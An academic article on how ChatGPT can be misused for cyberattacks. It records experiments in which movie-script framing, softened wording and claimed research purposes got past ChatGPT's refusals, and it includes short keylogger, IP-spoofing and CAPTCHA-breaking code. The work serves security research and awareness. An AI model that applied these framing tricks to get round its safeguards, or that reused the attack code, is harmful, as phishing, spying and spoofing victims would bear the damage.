ORIGINAL RESEARCH article

Front. Comms. Net., 04 September 2023
Sec. Security, Privacy and Authentication
Volume 4 - 2023 | https://doi.org/10.3389/frcmn.2023.1220243

When ChatGPT goes rogue: exploring the potential cybersecurity threats of AI-powered conversational chatbots

  • 1College of Technological Innovation, Zayed University, Abu Dhabi, United Arab Emirates
  • 2School of Engineering, ESPRIT, Tunis, Tunisia
  • 3School of Business, ESPRIT, Tunis, Tunisia
  • 4School of Computer Science and Mathematics, Liverpool John Moores University, Liverpool, United Kingdom

ChatGPT has garnered significant interest since its release in November 2022 and has showcased strong versatility across a wide range of industries and domains. Defensive cybersecurity is one area where ChatGPT has demonstrated considerable potential, thanks to its ability to provide customized cybersecurity awareness training and to assess security vulnerabilities and offer concrete remediation recommendations. However, the offensive use of ChatGPT (and AI-powered conversational agents in general) remains an underexplored research topic. This preliminary study aims to shed light on the potential weaponization of ChatGPT to facilitate and initiate cyberattacks. We briefly review the defensive usage of ChatGPT in cybersecurity, then, through practical examples and use-case scenarios, we illustrate its potential misuse to launch hacking and cybercrime activities. We discuss the practical implications of our study and provide some recommendations for future research.

1 Introduction

At the end of November 2022, OpenAI (OpenAI, 2022) officially released ChatGPT, an AI-powered chatbot that marked a milestone in the development of conversational language models. ChatGPT is a Natural Language Processing (NLP) model that enables users to engage in human-like conversations that are highly coherent and realistic. It is based on a language model architecture created by OpenAI called the Generative Pre-trained Transformer (GPT) (OpenAI, 2023). Table 1 provides a brief summary of the related works. Generative AI (GAI) is a field of artificial intelligence that focuses on generating new and original data or content using models pre-trained on massive datasets with advanced learning algorithms. Once pre-trained, generative models are fine-tuned on specific tasks to address the specific needs of users. GAI has a variety of potential applications, including computer vision, natural language processing, speech recognition, and the creation of new images, texts, sounds, and videos. Generative Adversarial Networks (GANs), Variational AutoEncoders (VAEs), and autoregressive models such as Generative Pre-trained Transformer (GPT) models are among the most popular GAI models (Brown et al., 2020; Aydın and Karaarslan, 2023).

TABLE 1. Literature review summary.

Transformer-based models, like GPT-2 and GPT-3, make use of the attention mechanism to produce coherent new text, images, and sounds that are remarkably similar to instances from the real world (Hariri, 2023). As a generative AI model, ChatGPT leverages the transformer architecture to analyze large amounts of text data, identify patterns, and mimic the structure of natural language. ChatGPT is based on the GPT model, which uses the Transformer architecture’s decoder component in an autoregressive fashion, meaning that the output text is generated one token at a time (Sebastian, 2023; OpenAI, 2023; Hariri, 2023). The specific GPT used by ChatGPT is fine-tuned from a model in the GPT-3.5 series (OpenAI, 2023). On 14 March 2023, OpenAI announced the release of GPT-4, a large-scale multimodal model that accepts images and text as input and produces text output; OpenAI has not disclosed its parameter count. On established NLP benchmarks, GPT-4 stands today among the most advanced conversational models (OpenAI, 2023).

What makes ChatGPT particularly distinctive is the application of Reinforcement Learning from Human Feedback (RLHF) (Uc-Cetina et al., 2022; Radford et al., 2018). According to OpenAI, human AI trainers used RLHF to feed the model with conversations in which they acted as both users and AI assistants (OpenAI, 2023). The resulting reward model is used to optimize GPT with a reinforcement learning algorithm, allowing ChatGPT to generate coherent, contextually appropriate text when fine-tuned for specific tasks (Radford et al., 2018).

ChatGPT is also a powerful extension to traditional search engines, since the model is now built into Microsoft’s search engine and web browser. Additionally, Alphabet has revealed that its AI-based conversational model will soon be available on the Google search engine (Griffith, 2023). However, there is a significant distinction between ChatGPT and search engines. ChatGPT is a language model that can understand natural language and engage in human-like conversations to provide explanations or answer specific queries. A search engine, on the other hand, indexes web pages on the internet to assist users in finding the information they are looking for. ChatGPT cannot search the internet for information; it generates a response using the knowledge it acquired from training data, which leaves room for potential errors and biases (Bubeck et al., 2023).

ChatGPT currently has over 100 million users, and its website receives over one billion visits per month, making it among the most popular AI-powered conversational tools (Nerdy Nav, 2023). Other conversational models include Amazon Lex, Microsoft Bot Framework, Google Dialogflow, and IBM Watson Assistant, among others.

ChatGPT has been applied across various industries and domains, including customer service, healthcare, education, marketing, finance, and entertainment. Defensive cybersecurity is a particular area where ChatGPT has demonstrated considerable potential thanks to its ability to analyze large data sets such as security logs and alerts, and its ability to identify threat patterns and generate customized cybersecurity guidelines and procedures. However, the offensive use of ChatGPT (and AI-powered conversational agents, in general) remains an underexplored research topic.

Kamoun et al. (2020) have shown how AI and Machine Learning Software (MLS) have become a mixed blessing for cybersecurity. ChatGPT and other AI-powered conversational models are no exception. In fact, while the InfoSec community is turning to AI/MLS to strengthen its cybersecurity defenses (Mijwil and Aljanabi, 2023; Haleem et al., 2023), some hackers and cybercriminals are trying to weaponize AI/MLS for malicious use (Kamoun et al., 2020). We therefore argue that it is important for the InfoSec community to understand the mechanisms by which cybercriminals can tweak ChatGPT and turn it into a potential cyber threat agent. Extending the research work by Kamoun et al. (2020), the aim of this exploratory study is threefold: 1) briefly highlight the defensive facet of ChatGPT in cybersecurity, 2) shed light on the potential adversarial usage of ChatGPT in the context of cybersecurity through illustrative use cases and scenarios, and 3) discuss the implications of the dark side of AI-powered conversational agents.

The remainder of this paper is structured as follows. Section 2 presents a summary of the usage of ChatGPT in cybersecurity defense. Section 3 illustrates via use cases how ChatGPT can be misused to facilitate and launch cyberattacks. Section 4 highlights the practical implications of weaponized AI-powered conversational models on the future of cybersecurity and provides a summary of the paper along with some suggestions for future research.

2 ChatGPT for cybersecurity defense

When used as standalone tools or in conjunction with other traditional defense mechanisms (such as firewalls, encryption, secure passwords, and threat detection and response systems), ChatGPT and other AI-powered conversational models can assist in improving organizational security posture. In this section, we provide a summary of the key applications of ChatGPT in cybersecurity defense. For additional details, we refer the reader to the previous work of Mijwil and Aljanabi (2023) and Kucharavy et al. (2023).

ChatGPT can be integrated into the organizational cybersecurity strategy to enable quick detection of and response to cyber threats, among other uses. For instance, since ChatGPT can analyze a vast amount of data, it can assist in identifying patterns and trends of data usage, monitor network activity, and generate reports on the overall cybersecurity of institutions (Gaur, 2023; Haleem et al., 2023). Additionally, ChatGPT can be used to create honeypots by issuing commands that simulate Linux, Mac, and Windows terminals and by logging the attacker’s actions, which can allow security teams to 1) collect information about attackers, including their tactics, techniques, and procedures (TTPs) and 2) detect potential vulnerabilities before they can cause significant damage (McKee and Noever, 2022a; McKee and Noever, 2022b).
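
To make the honeypot idea concrete, the following is a minimal Python sketch, not code from the cited studies: present a fake shell prompt, answer a few canned commands, and log everything an intruder types for later TTP analysis. The hostname, canned responses, and log file name are all illustrative assumptions.

```python
import datetime

# Illustrative canned responses; a real honeypot (or a ChatGPT-backed one)
# would emulate a much richer command set.
FAKE_RESPONSES = {
    "whoami": "root",
    "pwd": "/root",
    "ls": "backup.tar.gz  customers.db",
}

def fake_shell():
    """Present a fake root shell and log every command an intruder types."""
    while True:
        cmd = input("root@prod-db:~# ").strip()
        with open("honeypot.log", "a") as log:  # record the attacker's actions
            log.write(f"{datetime.datetime.now().isoformat()} {cmd}\n")
        if cmd in ("exit", "quit"):
            break
        print(FAKE_RESPONSES.get(cmd, f"bash: {cmd}: command not found"))

if __name__ == "__main__":
    fake_shell()
```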

ChatGPT can contribute towards enhancing cybersecurity in many other aspects such as:

- Providing customized cybersecurity awareness training, security guidelines, and procedures, including security incident reports.

- Conducting vulnerability assessment and providing an action plan on how to remediate the identified vulnerabilities.

3 ChatGPT as a potential cybersecurity threat

The swift proliferation of AI has resulted in the emergence of an impending risk of AI/MLS-based attacks (Kirat et al., 2018). Access to open-source AI/MLS models, tools, libraries, frameworks, AI-powered chatbots, and pre-trained deep learning models makes it easier for hackers to adapt AI models and tools to arm their hacking activities and exploits with more intelligence and efficiency (Kamoun et al., 2020). As a generative AI conversational model, ChatGPT is no exception. Today, the potential misuse of ChatGPT and other AI-based conversational agents to launch cyberattacks remains an underexplored research topic.

Despite its potential role in raising cybersecurity awareness and thwarting cyberattacks, ChatGPT can be misused and tweaked to generate malicious code and launch cyberattacks. Previously, cybercriminals were frequently limited in their ability to undertake sophisticated attacks by the need for coding and scripting expertise, which may involve creating new malware and password-cracking scripts (Sebastian, 2023). Although search engines can provide information in response to a keyword-based query for potential online hacking resources and tools, they often return a long list of web pages that users must navigate to find the information pertaining to their specific needs, and some of the results might not be relevant, especially for complex or ambiguous queries. On the other hand, as demonstrated below, users with basic coding skills can tweak ChatGPT to assist them in malware scripting and coding with minimum effort and in record time, thus lowering cybercrime’s barrier to entry. In fact, unlike keyword-based search engines, ChatGPT and AI-based conversational agents can understand and interpret the context of a user query and provide personalized and relevant responses even under complex and ambiguous scenarios.

It is worth mentioning that ChatGPT enforces ethical and legal guidelines for user behavior, content, and terms of use to prevent unethical and illegal activities. Many queries that suggest potential malicious use are denied, with an explanation of the reasons. However, there are several ways to lure ChatGPT into circumventing the security and ethical filters put in place to prevent unethical or harmful content from being generated or communicated. For instance, the wikiHow website (wikiHow, 2023) provides tips, with concrete examples, on how to get around ChatGPT’s security filters. These include using the “Yes Man” or DAN (Do Anything Now) master prompts, or framing the prompt as a movie script dialogue with characters completing a “fictional” task. In the latter case, a user can structure questions as conversations between fictional characters who need to find a way to solve a challenge that can involve hacking a computer system.

To illustrate how rephrasing a prompt so that it does not explicitly convey malicious intent or illegal activity can lure ChatGPT into generating a malicious response, consider the following case:

We asked ChatGPT to provide the commands needed to hide potential digital forensic evidence from a Parrot drone in case it gets captured. The request was declined based on ethical and legal arguments as illustrated in Figure 1.

FIGURE 1. ChatGPT’s initial response.

We then reframed the same request in a different context by invoking a movie script scenario as illustrated in Figure 2. This time ChatGPT responded with the source code (along with some explanations) that we were able to validate experimentally.

FIGURE 2. ChatGPT’s second response.

Kamoun et al. (2020) classified AI/MLS-powered cyberattacks by their activities (actions) into seven categories: probing, scanning, spoofing, flooding, misdirecting, executing, and bypassing. Some of these actions apply to ChatGPT, as discussed below.

3.1 ChatGPT for misdirection

Misdirection in the context of this study refers to the potential misuse of ChatGPT to deliberately lie to a target and provoke an action based on deception; such is the case of cross-site scripting and email scams (Kamoun et al., 2020). This application has been the subject of growing interest among the cybersecurity community. We focus on two ChatGPT-enabled potential misdirection threats, namely, phishing and malicious domain name generation.

Phishing is one of the most common social engineering cyberattacks. We distinguish massive (global) phishing, which aims to create simple and plausible-sounding emails with minimum effort, from spear (targeted) phishing, which requires social-engineering skills, considerable effort, and thorough probing of targets (Giaretta and Dragoni, 2020).

Since the inception of the Internet, cybercriminals have used email phishing as a primary attack vector for spamming and for delivering malicious URLs, attack payloads, and other illicit content (Ansari et al., 2022; Cambiaso and Caviglione, 2023). A recent Cisco cybersecurity threat trend report revealed that 90% of organizational data breaches are traced to phishing attacks (Cisco, 2021).

Singh and Thaware (2017) investigated how spammers can use AI/MLS to improve the success rate of their Business Email Compromise (BEC) scam phishing attacks by crafting customized genuine-looking emails.

Giaretta and Dragoni (2020) demonstrated how Natural Language Generation (NLG) techniques can enable attackers to target large community audiences with machine-tailored emails. For this purpose, they proposed the Community Targeted Phishing (CTP) technique to automatically craft such emails.

The conversational and interactive aspects of ChatGPT make it convenient for attackers to craft personalized, convincing phishing emails. ChatGPT has a convincing human-like capability, generating responses that are fluent and natural-sounding (Kaminsky, 2023). Previously, attackers had to send phishing emails in bulk; those emails were easily recognizable as they were impersonal and contained mostly generic text. ChatGPT can overcome this limitation, as it is able to refine a malicious email through iterative conversations until it produces convincing phishing at a large scale (Baki et al., 2017). This is also echoed by Dash and Sharma (2023), who noted that ChatGPT is poised to excel in preparing social engineering templates thanks to its powerful human-like text generation capacity. ChatGPT has also enabled threat actors to create multiple variations of social engineering attacks quickly and easily, which results in a higher probability of success (Cambiaso and Caviglione, 2023).

In an experiment inspired by Giaretta and Dragoni (2020), we requested ChatGPT to draft an email impersonating a scholar and inviting a young researcher to collaborate, while providing a link that redirects the target to a fake login page resembling the Google login page. The resulting conversation is illustrated in Figure 3.

FIGURE 3. A phishing email generated by ChatGPT.

In a second experiment, we explored the potential of ChatGPT to draft a convincing phishing email in a language other than English. Translating a phishing email from English to another language often yields stilted text that lacks coherence and authenticity. On the other hand, being trained on vast amounts of data, ChatGPT can understand the nuances of a particular language and produce text in different languages with much better quality in terms of accuracy, contextual understanding, and personalization. Such a capability can enable hackers to increase the success rate of their phishing attacks against target victims whose first language is not English, hence enlarging the scope of their phishing attacks to a global scale. Figure 4 illustrates ChatGPT’s capability to generate the same email used in the previous scenario in Arabic, with impressive accuracy and in a natural-sounding manner.

FIGURE 4. A phishing email in Arabic generated by ChatGPT.

Researchers at Check Point used ChatGPT and Codex (an AI tool that translates natural language to code) to create a phishing email with a malicious Excel file whose macros can download a reverse shell (Check Point, 2022). All generated outputs were created by the AI tools; the researchers only provided prompts (such as “Write a phishing email that appears to come from a fictional webhosting service, Host4u”) to get the desired result.

Though the aforementioned phishing emails might seem basic, the conversational and intuitive aspects of ChatGPT can enable hackers to customize, reframe and refine their queries to craft deceptive emails with a high success rate. This is accomplished thanks to the following inherent features of ChatGPT:

- Natural language processing capability allowing users to rephrase their queries to attain specific goals.

- Contextual understanding to refine responses and follow up on previous queries.

- A personalization feature, based on machine learning algorithms, that enhances user experience by providing more relevant and useful content, taking into account the user’s previous interactions.

In addition, new phishing emails can be generated by feeding victims’ responses into ChatGPT, thus producing convincing follow-ups effortlessly (Cambiaso and Caviglione, 2023; Kaminsky, 2023).

The creation of malicious domain names is another area where AI-powered conversational agents can be misused for potential misdirection. Berman et al. (2019) have shown that AI/MLS can be used to generate malicious domain names, which can feed several types of cyberattacks, including spam campaigns, phishing emails, and distributed denial-of-service (DDoS) attacks. Anderson et al. (2016) showed how Generative Adversarial Networks (GANs) can produce malicious domain names that evade current Domain Generation Algorithm (DGA) classifiers.

We conducted an experiment whereby we asked ChatGPT to provide a malicious domain name that could target the domain esprit.tn. ChatGPT declined the request, stating:

“As an AI language model, it is not ethical or appropriate for me to provide you with a malicious domain name that could harm your domain or any other domain. It is important to prioritize cybersecurity and protect your domain from potential threats.”

By rephrasing the original question and requesting similar domain names with the same .tn extension, we got the following response:

“However, here are some shorter domain names that are similar to esprit.tn and have the .tn extension: esptn.tn, esprtn.tn, esprittn.tn, esprt.tn, espt.tn, espr.tn, sprit.tn, espirit.tn, esprits.tn. Again, please note that some of these domain names may already be registered, and it is important to conduct thorough research and due diligence before registering a domain name to avoid any potential legal issues or conflicts.”
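
From a defensive standpoint, such lookalike names are straightforward to screen for. The following is a minimal Python sketch, our own illustration rather than part of the experiment, that scores each ChatGPT-suggested candidate against the legitimate domain with a standard-library string-similarity measure and flags close matches as potential typosquats (the 0.8 threshold is an assumed value).

```python
from difflib import SequenceMatcher

LEGIT = "esprit.tn"
CANDIDATES = ["esptn.tn", "esprtn.tn", "esprittn.tn", "esprt.tn", "espt.tn",
              "espr.tn", "sprit.tn", "espirit.tn", "esprits.tn"]

for name in CANDIDATES:
    # Ratio in [0, 1]; higher means the candidate looks more like the real domain.
    score = SequenceMatcher(None, LEGIT, name).ratio()
    verdict = "SUSPICIOUS" if score >= 0.8 else "ok"
    print(f"{name:<13} similarity={score:.2f} {verdict}")
```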

3.2 ChatGPT for execution

This refers to the capability of using AI-powered conversational agents to create and execute a malicious process on a target system, as in the case of viruses, spyware, and Trojans. Generally, AI/MLS has proven to be capable of generating a new breed of malware that can evade the best existing defenses. For instance, Petro and Morris (2017) demonstrated how DeepHack, a proof-of-concept open-source AI/MLS-based hacking tool, could break into web applications with full autonomy and with no prior knowledge of applications and databases.

As illustrated below, non-technical threat actors can, with simple tweaks, get ChatGPT to fine-tune its responses to contribute towards the generation of malicious code and malware.

We asked ChatGPT to write a program that stores keystrokes and sends them to example.com. At first, ChatGPT denied the request as OpenAI’s terms of use explicitly prohibit the creation of malware of any kind (Figure 5).

FIGURE 5. ChatGPT blocking a request due to its terms of use.

We next experimented with various techniques, such as avoiding loaded words like “malware” and “steal”, or breaking an extended prompt into separate, more straightforward ones. When these approaches fail, telling ChatGPT that the query is for research or educational purposes can also work.

In this second trial, we asked ChatGPT to write a program that just stores keystrokes (Figure 6, left). It generated a Python script that uses the keyboard.on_press function from the keyboard module; when a key is pressed, the script writes the name of the key to a file called keystrokes.txt. ChatGPT also provided the code for sending the file to a remote source, as illustrated in Figure 6 (right).

FIGURE 6. (left) A ChatGPT-created script that secretly stores keystrokes to a file. (right) A ChatGPT-created script that sends a file to a remote source.
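
For illustration, the following is a minimal reconstruction of the kind of keystroke-logging script described above (the exact ChatGPT output appears in Figure 6); we omit the exfiltration half. It assumes the third-party keyboard package and, on most systems, elevated privileges to hook the keyboard.

```python
import keyboard  # third-party package: pip install keyboard

def log_key(event):
    # Append the name of each pressed key to a local file.
    with open("keystrokes.txt", "a") as f:
        f.write(event.name + "\n")

keyboard.on_press(log_key)  # register the callback for every key press
keyboard.wait()             # block so the hook keeps running
```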

The above examples illustrate the possibility of weaponizing ChatGPT to produce malware code. Generating the code can be an iterative process, with each round improving and modifying the output to achieve the desired intent. Indeed, many cybercriminals have already released malware they created with ChatGPT in dark-web communities. Check Point researchers analyzed various hacking forums and discovered several instances of hackers using ChatGPT to develop malicious tools. Below we discuss three reported cases where threat actors successfully used ChatGPT to create working malware.

- Under a thread titled “ChatGPT–Benefits of Malware,” an anonymous user disclosed the usage of ChatGPT to recreate malware strains based on prior research publications (Check Point, 2023). The same user was able to develop a Python stealer program that looks for twelve common file types, including images, PDFs, and MS Office documents, copies them to a random folder, and then uploads them to a hardcoded FTP server (Check Point, 2023).

The same user distributed other cyber exploitation projects, one of which was a Java snippet created with ChatGPT that downloads and launches a popular SSH client using PowerShell.

- In another post, an anonymous user published a Python script that performs cryptographic functions. The person revealed that it was the first script they had ever created and that they used OpenAI to write it. The malware script performs different cryptographic tasks, such as creating a cryptographic key and encrypting system files; it could also be modified to fully encrypt a victim’s machine, effectively functioning as ransomware (Check Point, 2023).

- In a third post, an anonymous user discussed how to develop a dark web marketplace using ChatGPT (Check Point, 2023). The goal of the platform was to serve as a black market for exchanging illegal and stolen goods, such as malware, drugs, and ammunition. The person also shared a script that uses third-party APIs to fetch up-to-date cryptocurrency prices for the platform’s payment system (Check Point, 2023).

In a recent study, Mulgrew (2023) built a zero-day virus with undetectable exfiltration using only ChatGPT prompts. The malware was embedded in an SCR file, a format that launches automatically on Windows. Once installed, the malware searches through various files on the computer, including images, Word documents, and PDFs, to steal data. It uses steganography to split the stolen data into smaller pieces and hide them within other images on the computer. These modified images are then uploaded to a Google Drive folder to avoid detection.

We carried out our own experiment by trying to manipulate ChatGPT into proposing malicious code: an evasive attack program that activates only when it detects the face of a target individual. The initial response of ChatGPT is illustrated in Figure 7.

FIGURE 7. ChatGPT’s initial response.

As may be seen from Figure 7, ChatGPT’s response referred to a Python program. We requested ChatGPT to provide details about this code, as illustrated in Figure 8.

FIGURE 8. ChatGPT’s detailed code for the evasive attack program.

This exercise can continue further to elicit more details regarding the complete source code of the evasive attack program.

As a side note, it is worth mentioning that, given the advanced anti-malware tools available in the market, the effectiveness of the malware samples generated by ChatGPT might be limited. For instance, Borrero (2023) and Crothers et al. (2023) observed that some malware samples created with the assistance of ChatGPT were either non-functional or easily detected by firewalls and antivirus tools.

3.3 ChatGPT for scanning

This refers to using ChatGPT to probe organizational assets sequentially to detect which assets have a specific characteristic. In the context of operating system fingerprinting, Song et al. (2019) showed how an artificial neural network correctly identified operating systems with a 94% success rate, higher than the accuracy of most conventional rule-based methods.

We asked ChatGPT to provide code to correctly identify operating systems with a high success rate. The initial and follow-up responses are depicted in Figures 9, 10, respectively.

FIGURE 9. ChatGPT’s initial response.

FIGURE 10. ChatGPT-generated Python source code.

As may be seen, the source code of an AI-based algorithm for identifying operating systems was successfully disclosed.
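
As an illustration of what such code looks like, here is a minimal sketch, with synthetic data rather than ChatGPT’s actual output, of the underlying approach: train a classifier to map TCP/IP fingerprint features, such as initial TTL and TCP window size, to an operating system label. The window-size values are illustrative; the TTL defaults (64 for Linux/macOS, 128 for Windows, 255 for Solaris) are well-known textbook values.

```python
from sklearn.ensemble import RandomForestClassifier

# (initial TTL, TCP window size) -> OS label; illustrative training data.
X = [[64, 64240], [64, 65535], [128, 64240], [128, 8192], [255, 8760]]
y = ["Linux", "macOS", "Windows", "Windows", "Solaris"]

clf = RandomForestClassifier(n_estimators=50, random_state=0).fit(X, y)

# Classify a fingerprint observed from a probed host; expected: ['Windows'].
print(clf.predict([[128, 64240]]))
```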

3.4 ChatGPT for flooding

This refers to using ChatGPT to potentially overload an organizational asset’s capacity.

We asked ChatGPT to provide the code for an AI-based wireless jamming attack. The initial and follow-up responses are illustrated in Figures 11, 12, respectively. As may be seen, the request was successfully processed, with the code supplied along with a few explanations.

FIGURE 11. ChatGPT’s initial response.

FIGURE 12. ChatGPT’s more detailed response with the Python source code.

In a subsequent experiment, we sent a query for an AI-based classifier to guess the content of a CAPTCHA image. CAPTCHA images are used to restrict computer-automated submissions, reduce spam and fraud, and prevent automated bots from conducting malicious activities. A minimal sketch of such a classifier follows Figure 14.

The initial and follow-up ChatGPT responses are illustrated in Figures 13, 14, respectively.

FIGURE 13. ChatGPT’s initial response.

FIGURE 14. ChatGPT’s more detailed response with source code.
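
The following is a minimal sketch, not ChatGPT’s actual output, of the kind of classifier such a query elicits: a small convolutional network with one classification head per character position. The CAPTCHA length (5), alphabet (digits only), and image size (60x160 grayscale) are illustrative assumptions, and real use would require training on labeled CAPTCHA images.

```python
import torch
import torch.nn as nn

NUM_CHARS = 5      # assumed CAPTCHA length
NUM_CLASSES = 10   # assumed alphabet: digits 0-9

class CaptchaCNN(nn.Module):
    def __init__(self):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv2d(1, 32, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
            nn.Conv2d(32, 64, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
        )
        # One logit per (position, character class).
        self.head = nn.Linear(64 * 15 * 40, NUM_CHARS * NUM_CLASSES)

    def forward(self, x):  # x: (batch, 1, 60, 160) grayscale CAPTCHA images
        z = self.features(x).flatten(1)
        return self.head(z).view(-1, NUM_CHARS, NUM_CLASSES)

model = CaptchaCNN()
dummy = torch.randn(1, 1, 60, 160)   # stand-in for a real CAPTCHA image
print(model(dummy).argmax(dim=2))    # predicted character index per position
```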

3.5 ChatGPT for probing and vulnerability detection

Another concern with ChatGPT is its potential ability to provide malicious users with tips and step-by-step instructions on how to probe organizational assets and determine their characteristics and vulnerabilities, which can be exploited later to launch an attack. ChatGPT can analyze large amounts of data and identify vulnerabilities that traditional testing methods might overlook. This can benefit both cybersecurity specialists and cybercriminals. Cybernews researchers (Cybernews, 2023) demonstrated how ChatGPT can assist in vulnerability detection through a simple experiment carried out on “Hack the Box,” a platform that enables organizations and individuals to improve their offensive and defensive security expertise. The initial prompt was, “I am faced with a penetration testing challenge. I am on a website with one button. How would I test its vulnerabilities?”. The researchers then conducted a series of queries asking ChatGPT to automate the entire process, and they were able to get step-by-step instructions on where to focus their efforts, which steps to follow, and even examples of exploit code they could use (Cybernews, 2023).

Other cybersecurity researchers have also explored the application of ChatGPT to vulnerability detection. In experiments on a code repository containing 129 vulnerable files, each containing one or more vulnerabilities, Koch (2023) found that ChatGPT discovered more vulnerabilities than traditional tools. When ChatGPT scanned the files, it produced genuine findings with detailed information and deeper insights into how the vulnerabilities could be exploited. Some of the vulnerabilities discovered by ChatGPT for the script depicted in Figure 15 (right) are as follows:

- Log injection vulnerability: the “injectLog” action method accepts a parameter “userInfo” as a string and concatenates it with the “error!!” string to log the error message. An attacker can potentially inject malicious input into the “userInfo” parameter, causing unexpected behavior or even a security breach (a minimal Python illustration of this pattern follows Figure 15).

- Lack of authentication and authorization: The controller does not have any authentication or authorization mechanism, which means anyone can access the “injectLog” method and log an error message. Depending on the context and use case, this could pose a security risk.

FIGURE 15. A script for ChatGPT to review and detect vulnerabilities (Koch, 2023).
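
To clarify the log injection finding, the following is a minimal Python illustration of this vulnerability class together with a simple mitigation; the script ChatGPT actually reviewed appears only in Figure 15 and is not reproduced here, so the function names below mirror the description rather than the original code.

```python
import logging

logging.basicConfig(filename="app.log", level=logging.ERROR)

def inject_log_vulnerable(user_info: str):
    # Vulnerable: input such as "alice\nERROR admin login OK" forges an
    # extra, legitimate-looking line in the log file.
    logging.error("error!! %s", user_info)

def inject_log_sanitized(user_info: str):
    # Mitigation: neutralize CR/LF so attacker input stays on one log line.
    safe = user_info.replace("\r", "\\r").replace("\n", "\\n")
    logging.error("error!! %s", safe)

inject_log_sanitized("alice\nERROR: forged entry")  # logged as a single line
```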

3.6 ChatGPT for spoofing

This refers to using ChatGPT to create malicious code capable of disguising the identity of an entity. We requested ChatGPT to provide code for IP spoofing, which is typically used by hackers to alter the headers of IP packets in order to forge the source IP address and hence hide the source of the attack. The initial and follow-up responses of ChatGPT are shown in Figures 16, 17, respectively. As may be seen, the request was successfully processed, with the code supplied along with a few explanations. Validating the effectiveness of the generated code in evading intrusion detection systems (IDS) is beyond the scope of this paper.

FIGURE 16. ChatGPT’s initial response for the IP spoofing code.

FIGURE 17. ChatGPT’s follow-up response with the IP spoofing code details.
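
For context, the following is a minimal sketch of what IP spoofing amounts to technically; it is not the code ChatGPT produced (which appears in Figure 17). It assumes the third-party scapy package and uses reserved documentation addresses; crafting raw packets requires root privileges, and sending spoofed traffic on real networks is illegal and widely filtered (BCP 38 ingress filtering).

```python
from scapy.all import IP, ICMP, send

# Build an ICMP echo request whose source address field is forged.
# 203.0.113.99 and 192.0.2.10 are reserved documentation (TEST-NET) addresses.
pkt = IP(src="203.0.113.99", dst="192.0.2.10") / ICMP()

send(pkt, verbose=False)  # emitting raw packets requires root privileges
```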

4 Conclusion and implications for research and practice

This study has demonstrated, via concrete examples, the potential of ChatGPT to “educate” and guide malicious users to discover and exploit vulnerabilities, craft convincing phishing emails, scan organizational assets and overload their capacity, hide their true identities, erase digital forensic evidence, and create malware programs that could be used to harm, disrupt, or exploit computer systems, networks, or devices. The results correspond to tests performed at the time of the research project; future ChatGPT responses might vary depending on the fixes that may be introduced to address some of the issues highlighted in this study.

Like other AI/MLS models, ChatGPT, and AI-powered conversational agents in general, can be both a blessing and a curse on the cybersecurity front. ChatGPT can offer new opportunities for cybercriminals to quickly enhance their hacking skills and launch effective cyberattacks. Although the malware currently being developed using ChatGPT remains relatively simple, there are concerns that it will gain sophistication as this AI-based conversational model evolves with more power and subtlety in future releases.

While we have not delved into all possible use cases of misusing ChatGPT for malicious intents, it is clear that the initial findings reported herein are already worrisome. Therefore, we argue that there is a need to raise awareness among cybersecurity academic and professional communities, policymakers, and legislators about the interplay between AI-powered conversational models and cybersecurity, and to highlight the imminent threats that weaponized conversational models pose. The integration of AI-based conversational agents like ChatGPT into Internet search engines is also poised to bring the potential cybersecurity merits and threats of these models to a new level.

It is equally important for the providers of AI-based conversational chatbots to be mindful of the possible loopholes and vulnerabilities that malicious users can exploit and to continuously adapt their algorithms accordingly.

There are also plenty of opportunities for cybersecurity students to explore ChatGPT and other conversational models to enhance their understanding of various topics pertaining to cybersecurity concepts and practices by learning how to ask and refine queries to attain targeted goals.

Our research has showcased just a few samples of the potential offensive use of ChatGPT. It would be interesting to extend this study to include more comprehensive coverage of other potential misuse cases and to validate the success rate of the exploits generated by ChatGPT in infiltrating firewalls and Intrusion Detection Systems (IDS).

It is also recommended to proactively anticipate potential misuse cases of ChatGPT and share the corresponding countermeasures with the InfoSec community. We hope that this preliminary study will stimulate further contributions in the emerging field of weaponized conversational models and their implications for the future of the cybersecurity profession, education, and research.

Data availability statement

The original contributions presented in the study are included in the article/Supplementary Material, further inquiries can be directed to the corresponding author.

Author contributions

FI initiated the research project, defining the problem statement and proposing a draft methodology. The method was implemented and the experiments conducted by FS. FK spearheaded the compilation of results and the write-up of the manuscript. ÁM led the structuring, formatting, and final proofreading of the paper. All authors contributed to the article and approved the submitted version.

Acknowledgments

This study was supported by a Research Incentive Fund (R22022) from the Research Office, Zayed University, United Arab Emirates.

Conflict of interest

The authors declare that the research was conducted in the absence of any commercial or financial relationships that could be construed as a potential conflict of interest.

Publisher’s note

All claims expressed in this article are solely those of the authors and do not necessarily represent those of their affiliated organizations, or those of the publisher, the editors and the reviewers. Any product that may be evaluated in this article, or claim that may be made by its manufacturer, is not guaranteed or endorsed by the publisher.

References

Anderson, H. S., Woodbridge, J., and Filar, B. (2016). DeepDGA: adversarially-tuned domain generation and detection. arXiv:1610.01969. Available at: http://arxiv.org/abs/1610.01969 (Accessed October 6, 2016).

Ansari, M. F., Sharma, P. K., and Dash, B. (2022). Prevention of phishing attacks using AI-based cybersecurity awareness training. Int. J. Smart Sens. Adhoc Netw. 3 (3), 61–72. doi:10.47893/ijssan.2022.1221

Aydın, Ö., and Karaarslan, E. (2023). Is ChatGPT leading generative AI? What is beyond expectations? SSRN Electron. J. doi:10.2139/ssrn.4341500

Baki, S., Verma, R., Mukherjee, A., and Gnawali, O. (2017). “Scaling and effectiveness of email masquerade attacks,” in Proceedings of the 2017 ACM on Asia Conference on Computer and Communications Security, Abu Dhabi, United Arab Emirates, April 2-6, 2017.

Ben-Moshe, S., Gekker, G., and Cohen, G. (2022). OpwnAI: AI that can save the day or hack it away. Check Point Research. Available at: https://research.checkpoint.com/2022/opwnai-ai-that-can-save-the-day-or-hack-it-away/

Berman, D. S., Buczak, A. L., Chavis, J. S., and Corbett, C. L. (2019). A survey of deep learning methods for cyber security. Information 10 (4), 122. doi:10.3390/info10040122

Brown, T. B., Mann, B., Ryder, N., Subbiah, M., Kaplan, J., Dhariwal, P., et al. (2020). Language models are few-shot learners. arXiv:2005.14165. Available at: https://arxiv.org/abs/2005.14165 (Accessed May 28, 2020).

Bubeck, S., Chandrasekaran, V., Eldan, R., Gehrke, J., Horvitz, E., Kamar, E., et al. (2023). Sparks of artificial general intelligence: early experiments with GPT-4. arXiv:2303.12712 [cs]. Available at: https://arxiv.org/abs/2303.12712 (Accessed March 22, 2023).

